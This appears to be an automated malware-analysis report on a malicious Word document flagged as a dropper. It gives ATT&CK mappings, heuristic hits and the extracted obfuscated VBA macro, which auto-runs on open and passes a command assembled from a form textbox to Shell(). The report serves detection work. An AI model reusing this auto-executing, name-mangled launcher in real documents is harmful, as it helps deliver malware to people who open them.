MALICIOUS
Risk Score: 292

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1059.001 PowerShell
- T1203 Exploitation for Client Execution
The sample is a malicious Office document containing VBA macros. The 'autoopen' macro triggers a Shell() call, which is highly suspicious and indicative of executing arbitrary commands. Heuristics also indicate suspicious references to cmd.exe and PowerShell, suggesting the macro is used to download and execute a second-stage payload. The ClamAV detection 'Doc.Dropper.Valyria-6786368-0' further supports this dropper functionality.
Heuristics (10)

- ClamAV: Doc.Dropper.Valyria-6786368-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Dropper.Valyria-6786368-0
- VBA macros detected (medium, OLE_VBA_MACROS, 3 related findings): Document contains VBA macro code
- Shell() call in VBA (critical, OLE_VBA_SHELL): Shell() call in VBA. Matched line in script: `_ .Shell(KtYibDBtM, tjvkwtTXUW), iUSwc) Set LNKkfbuIwvmiIEYLD = RarBNJlzTFIHoMqisWOsB`
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- AutoOpen macro (low, OLE_VBA_AUTOOPEN): AutoOpen macro. Matched line in script: `Attribute VB_Control = "TextBox1, 0, 0, MSForms, TextBox" Sub autoopen() hfBNSWPs`
- Suspicious cmd.exe invocation with execution flag (high, SC_STR_CMD): Suspicious cmd.exe invocation with execution flag
- Reference to PowerShell (high, SC_STR_POWERSHELL): Reference to PowerShell
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Suspicious extracted artifact (info, EXTRACTED_FILE_STATIC_TRIAGE): One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 8564 bytes |

SHA-256: 98d9c877b71a56b71f75935b03042d338d4c451864b954cf3cffd0f0e34601ee

Detection:
- ClamAV: No threats found
- Obfuscation or payload: likely. 238 of 273 identifiers look randomly generated (e.g. 'ViThGSPwrldMKjVcmPlWhija') — consistent with name-mangling obfuscation.

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "TiRPGphXSiJjsk"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "TextBox1, 0, 0, MSForms, TextBox"
Sub autoopen()
hfBNSWPs
End Sub
Attribute VB_Name = "OOhkLcRLiN"
Function hfBNSWPs()
On Error Resume Next
Set BRqzlLOwDAjRnFCDElNicG = bJvlAKvvbQNMtK
Select Case pGUzYGjirbcCpmiMNuPO
Case 261804665
ZOlHFEBZtIsavGKciusfDK = IGJzDARdvqzjGOQAfdR
TJOqXCkMVWImPqcBwGzZc = 205203632
kvaEOStMClcEzrSaBPFIZhNQ = lODZfsFoMiuwzVubJ
Case 42397184
mldJifvJXWXCiJ = CByte(dDpnWtXPmNXdDtKjPbLdiH)
ZtkiiRpbMnIsrlV = ChrW(IPWrwGBrPMqHbWfKVwQum)
pzwlLqvBTvtqDOHQ = Log(SssSVbhApHwXsVb)
End Select
Set ZYcAlRUvsMcTisZVwnqp = WzrBKXCtoAihqXwEvTLMZXJ
Select Case ckKzEFRPMlDZkwatS
Case 14044208
MulsUaQDUidVzq = ZaNEpiiSUFUZTwsStWTw
qspWnBzljPEiHZAjNN = 138243627
cRmABzHcMjwjtJjiXiCh = jlpPrLXsmjJwSsZFoVptU
Case 165884727
QYowqSIfKnsvjz = CByte(KlkjZCoibQJcjMMnQHkYr)
NhadBwKZwsHDLD = ChrW(lzzcqNhjpZSwzcnv)
uIYDJwBpXBUQUfBIifI = Log(wAofAlEiAKzJzjJDiGbDvm)
End Select
Set wtDnIDBBBZAKwSkzCmjQzLiA = wStYIHGWftlcpFkYTD
Select Case zZKZAdrMMvwlODQJkHctRu
Case 260893172
ZwXMjwrfHqCzotsuQ = uaiIXZZwzRqKWDmtACGffPEQ
YATUrPicWzMhRbznkwap = 319270447
zLvtqolPiWSdwYFbIB = hADZLjaIrvTibhE
Case 5672604
YzYurGUqPncYhIn = CByte(jOTvlkJQftUKsqwuYzC)
dOquiivwzjJmjFvS = ChrW(EWooIOzlKwZqiAjFcuRYY)
CpNSvkhimudJTbOW = Log(zsIYkVFPiZhDLduMrT)
End Select
Set LzuZPRLrbQHfBiXEj = dGPsUztPObUOphowzrFE
Select Case qErKmvjbRjDWSFQDSdu
Case 213305627
DkXMbarCfjzbCn = YihDNnwsQrWbYv
NKYanUTzLVoZmDEvQSOf = 240899863
qTMGrHUEwTGwSoDczhFkViYO = pMwGJJQvQTFNjcM
Case 189658054
WVSokPsnShZzbIu = CByte(zCuYwoJqCBUwPTEtIPLDwUEw)
SrcqwpLKPiaREH = ChrW(LclivuYwcjrMzrBcwwTjw)
zGMInzkibDHcrUjVAKttz = Log(EdOTNGcTkbldcfWm)
End Select
Const tjvkwtTXUW = 0
Set ivndosmnivwVZclqpdiGSX = klJAAFSClsrISEaKVQhw
Select Case HuzRiqWWnUVKOCs
Case 200527262
mhQsKdhUSlPSMplbadqKjRP = jwYWwDChjiizjNzRRzQEGDai
joZBUIURVLMFLVOjimiLm = 309701653
fYsmBLodYumPPdjM = KhLBkMGbBUYQrSzobt
Case 189246140
WSGjinLZGwGBaMBEjLv = CByte(mKzqPMjbpaokDkzr)
iTwBhVDOWqfRsEQwQpL = ChrW(PQVHjkfKWwqMJdFswK)
pwbsWBJwWXlnvoY = Log(OzpRwpssYzSHPzYz)
End Select
Set tzavHBKRiJhCwAwtOomhjp = YJvtMfbvGSGziMvETE
Select Case PHVtWRBzPJLrHDiClMIw
Case 247700803
NbjpAQjSkSdDaL = PZbKiMmvbzvDKK
LFrLtuJhRlRwZsOEdTzWmjn = 22500939
bjIpEMWIsGXLORIFsKZRPMC = vSkKnEfRoUSOBrMY
Case 309579775
hlqsOBrQuVOmbOdvumbLVn = CByte(GXtztEAwAWcfQWCDjTW)
JDBtDkFwazjStKkV = ChrW(CwMtWNQzjNZsirswdS)
VAvJwEYDmJlGlj = Log(hUKQmqluUXjDrFrUQriAU)
End Select
Set ickFAzsTSRvQJznqiJAvU = jhjmRCfqbXGnzBr
Select Case wJCirWqMDGTXRiX
Case 218108518
YtDYNhpncpXJWAlwY = rsqPNrTjLjIYtAZY
InhkbMqOjSDhGhYtWjo = 160153290
jMFiWGiEwXjwZdL = aPjzBjYQBECkfWUlzScbbFF
Case 43529561
KjuTjhENBwQIYHzn = CByte(dRDuYaDwwGBjPUJZoqziwS)
zXdZDcbLcomcoCRlJr = ChrW(laDimbHikQCJsKtGXv)
zVWvYudsVWWFom = Log(hwusqwwtquaftSuwtpI)
End Select
Set zkPkGpXiijUaJLlkwicnKf = VXnsuCRlGFkcpOiZEFkmjoG
Select Case zvsmdfqiRptMTwd
Case 207018758
uOUYiwWRJXhZtLjR = swJfIaPFLzUSFIcFYpalj
zWVUIIFYiNvlDiVim = 263827574
TXwBzDPFTUVGfBb = nKoSHAnVHWUEzjqDmjNuCUVQ
Case 292820319
mDIGQjbfiXwVwS = CByte(buciLHjdSUwohwSoXZENj)
AGlcRBTEQiuKaath = ChrW(vCZqmRuujPjavuEAPuVzi)
hKNEPuXWsuqsILJWOoriim = Log(iUopJLfXkwFUPchBAWMXo)
End Select
Set ZAzSzaHSpjjOVuUiwjSoVMUB = RKjUnmDIhSLcDSivKhqXWRDJ
Select Case JzcLaMfzWhQYzB
Case 303494989
GocIGsRnsLfddZAGZTim = zGFffhlOXMjwrQcbAuR
oTPhBTwjJwiXHFIiWcbKf = 169373502
wzhmJXfZYMDmirYiLk = EYiIpmHuEXTGCO
Case 326862846
iUhnJdYFKDTirzwPa = CByte(UwPqrzBdaCEFBXjaqJd)
vazdwlTdDHYDjbtAArdhlfDW = ChrW(FCvzQHpldjuwms)
jYaTiBZZdfZwfwK = Log(XdcsiXfnAiRCvzDOz)
End Select
KtYibDBtM = TiRPGphXSiJjsk.TextBox1 + pwJdpz + MzKXnNfM + vUjCMVRO + bmSBj + pVODfOaj + ojHEWPs + voSLj + skhkjrq + fbBEWZJn + JSChOzv
Set wfIrKQMljFrXXPAPwi = PRhEiwTLXGIKuwURJriAmk
Select Case SMIISiTmjNkXCPbdtrE
Case 271324591
YuwZDwqXUdBfsOsVpBdE = ZzKaRBiOkJhvtuRMjO
cOOjjrKAjIDpbkLwzmwmw = 50436186
kTTkwUaIFmtbELNa = GAzFjTGKivTalcnVFiQQH
Case 79933029
IzwDiJHnkLPfvIEDAMZQ = CByte(HiUJFGzhzKbuUrGiPYB)
IjOWzrNBaPDiwHBRduc = ChrW(HGnBokbRwUkoYo)
XTzLNtwGhGswMqoEV = Log(wTCwNhNQwDGfPJHrdzjiOJJA)
End Select
Set ADDMuvOSqbMlKLlo = WzbBIlVzFqLzICPbwCmO
Select Case hFGbzpJwbSQDmNUlMrS
Case 225805066
pFDTiYwKOJwZDprU = IwLAdXuvWpvqjKUjMrA
HRQNnMJRiiYcQm = 226719338
WMLhIYLjAUiwitrzrQ = rfzMQOdRnRTZzczJz
Case 213549154
vjGhMThKmkrakzTrq = CByte(zuTiGXShuhWjkrRZVik)
ktjDrjwqiZdkHkAlwRdiOfYA = ChrW(FAzJLikGsoGLPnZabwUDlZ)
rfaEFCjFUiPljz = Log(XvtiOvtaiiDHmjDwCfAI)
End Select
Set JdrFiluUvKZtAcIMKVqm = NospDwjFrqGJwsRESlATlki
Select Case sVlRtClHwhwpzQapNPET
Case 122713304
DkrHrkqTJdJPwiLPLoFzM = vcFCLKFWfLKIRAamK
RdYTfjUrdwDPOT = 154597339
oPCpYfNnzwFnRKpZdDhjqb = ViThGSPwrldMKjVcmPlWhija
Case 127906618
imKlnzMSjHFwGUh = CByte(OCnwipIbvUFFPq)
sNzodlFzfzsDOW = ChrW(IQofQimVioijpTsGCqFMkJ)
EPIFIwmmtEGLoRkaXGsS = Log(zCPdnspMIKEwlj)
End Select
YiWsB = Array(fjHDpSPi, rqfFN, bVFzZluCN, Interaction _
_
_
_
_
_
_
_
.Shell(KtYibDBtM, tjvkwtTXUW), iUSwc)
Set LNKkfbuIwvmiIEYLD = RarBNJlzTFIHoMqisWOsB
Select Case YzLiIahBzUTzfuZJAAzfIp
Case 3325502
HanZLBwKkcCrqiAKSRFoopj = JjWNtVhiwUbinIpwXIPDrhTW
oNqjMCRtqQciiR = 96031725
TtVCSXKbHQfadEbPANFHqwm = JpwrNTprAIYowThRD
Case 95094048
vXrPloMiULGDUGCsdaSO = CByte(boZUjnRjfnEcWrvSZLCAoU)
tEDhvaErkzoUiRvFBuwo = ChrW(CbwPHaEOPNzHIjPdFWF)
vTchWMAdGAFqfHrdESn = Log(AcUmpNalfbwYsN)
End Select
Set DJpnmJjIZiJKciKaLJWfIkM = iAzsMLYNSFausKiVZWOriQw
Select Case vDUbBRlSzzImJrvNKwsXDQ
Case 224873300
iBGlWVJOCKzIqw = AUIzuBsLiaBjlYal
VTwAKzwboujztnWNlrDv = 123766945
zlpYLUoXpbYRmWzKpULVFG = MomiSAjXqMhUKKmn
Case 184344633
REHbbAzNaBijziscdkYpVX = CByte(DhFFCpADhjinBCl)
mfEZfpGPzbijCPmR = ChrW(vDtWvzYazBAPurasYmKQzdO)
qFaGTBSzQtGwrprijzh = Log(GAEkIoidbAwSpSjpWRGwjD)
End Select
Set SDBSFfWPmAbjwY = pZpsZnLCrXOUzn
Select Case ppCDftiLQkKaELdBGBbVQAM
Case 161658620
HBJuqKWcsKlhttHGO = HPNGqNWISYRdoddnXrZ
ZZnwMBsTMIUPCbFJC = 8400893
vYiswKOVIEFVPhwz = bPtpVDvJDCbNXUkWhirrh
Case 272963069
wfjPGnFhDcXimHUZUniuHn = CByte(kkUzhDGHzlcvKmo)
WwUXkAlwOMEWDzufKWwilo = ChrW(izUYwKLKnjwLvnPYkw)
kUwjEAqwlonJCibqZQ = Log(pnDCQqEnzsuwOjODCfO)
End Select
Set LMVcpcOiLDXzfw = zfWVRmZwGzsLiHjsJWkhmfF
Select Case GZGjGszpawiHJYDOmPP
Case 187732271
RjabKOduQHRazOrfqqNCCkid = jkSWvXQccpqjHwiTuJoM
MJMiwZCaujBwzadLYVkB = 326404663
ZBziuiiIauQvXaFnzw = ChIpjIVAIWoDLiqk
Case 76083725
NfTrmGGjDDDFkVmnuoQMP = CByte(ZiallrEMjquElSuLuCi)
ERzDlSRYoCTzTn = ChrW(lQBUPbqWMKfkTtj)
OdMWHlXzTajYiWulwMIutiT = Log(OuksGiziFJFWGQwAtBA)
End Select
Set TbZuhiCwScZsPWGKUSnz = SrbGWzARtaSOjvQLLVTBCNK
Select Case pjurLvfCqoAkwnLiCi
Case 164633403
HijapzJzUwoFjF = mFJGwuPXsufMXJlwY
IOLATBLliiuAvDsXZcsXaH = 294470251
qjJnlnizPQYrFlm = vMLjdrwcTAkIFAO
Case 7262653
EJnrYAvAwkffBRnqkc = CByte(vMdzhhTkDarPCXWA)
zQXMQfjGTwSiwRUXAFI = ChrW(KFJEPrZEUcIfRLrUEBi)
wsNkBCGIXsBRNYRtGSwZ = Log(cmronRlZASwabfS)
End Select
End Function